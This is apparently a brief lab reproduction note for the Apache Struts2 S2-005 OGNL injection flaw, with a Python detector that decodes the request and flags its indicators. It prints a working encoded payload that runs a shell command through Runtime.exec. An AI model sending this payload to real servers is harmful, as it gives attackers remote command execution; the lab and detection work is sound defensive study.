Vulnerability overview
Affected versions: 2.0.0 - 2.1.8.1
For vulnerability details see: https://github.com/vulhub/vulhub/blob/master/struts2/s2-005/README.zh-cn.md
Although it is not very detailed.
Vulnerability reproduction
Sending the following parameters executes the command touch /tmp/success,
but nothing is echoed back:
(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1
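A defender-side check for this kind of request, added here as an example and not part of the original write-up: it undoes the percent-encoding and the Java-style \uXXXX escapes that hide `#` and `=` in the payload above, then matches the OGNL indicators that payload exposes. The two sample query strings are constructed (one is the payload quoted above, one is a benign request); the indicator names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample traffic: the S2-005 query string quoted on this page plus one benign request.
S2_005_QUERY = (
    "(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true"
    "&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]"
    "%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))"
    "&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')"
    "(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1"
)
BENIGN_QUERY = "action=save&id=42&comment=looks%20fine"

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

def normalize(query: str) -> str:
    """Undo the two encoding layers the payload relies on: percent-encoding
    (applied repeatedly to cover double encoding) and Java-style \\uXXXX
    escapes, which turn \\u0023 back into '#' and \\u003d back into '='."""
    decoded = query
    for _ in range(3):                      # bounded loop: stop once decoding is stable
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)

# Indicators taken from the payload above; matched against the normalized text.
INDICATORS = {
    "member_access": re.compile(r"#_memberAccess"),
    "allow_static_method_access": re.compile(r"allowStaticMethodAccess"),
    "deny_method_execution": re.compile(r"xwork\.MethodAccessor\.denyMethodExecution"),
    "runtime_static_call": re.compile(r"@java\.lang\.Runtime@getRuntime"),
    "ognl_parameter_name": re.compile(r"(?:^|&)\("),   # a parameter whose *name* is an OGNL expression
}

def detect_s2_005(query: str) -> list[str]:
    """Return the sorted names of every indicator present in the request query string."""
    text = normalize(query)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

if __name__ == "__main__":
    for q in (S2_005_QUERY, BENIGN_QUERY):
        print(detect_s2_005(q) or "clean", "<-", q[:60])
```

Matching on the normalized form matters: the raw request never contains a literal `#`, so a rule that looks for `#_memberAccess` without decoding `\u0023` first misses this payload.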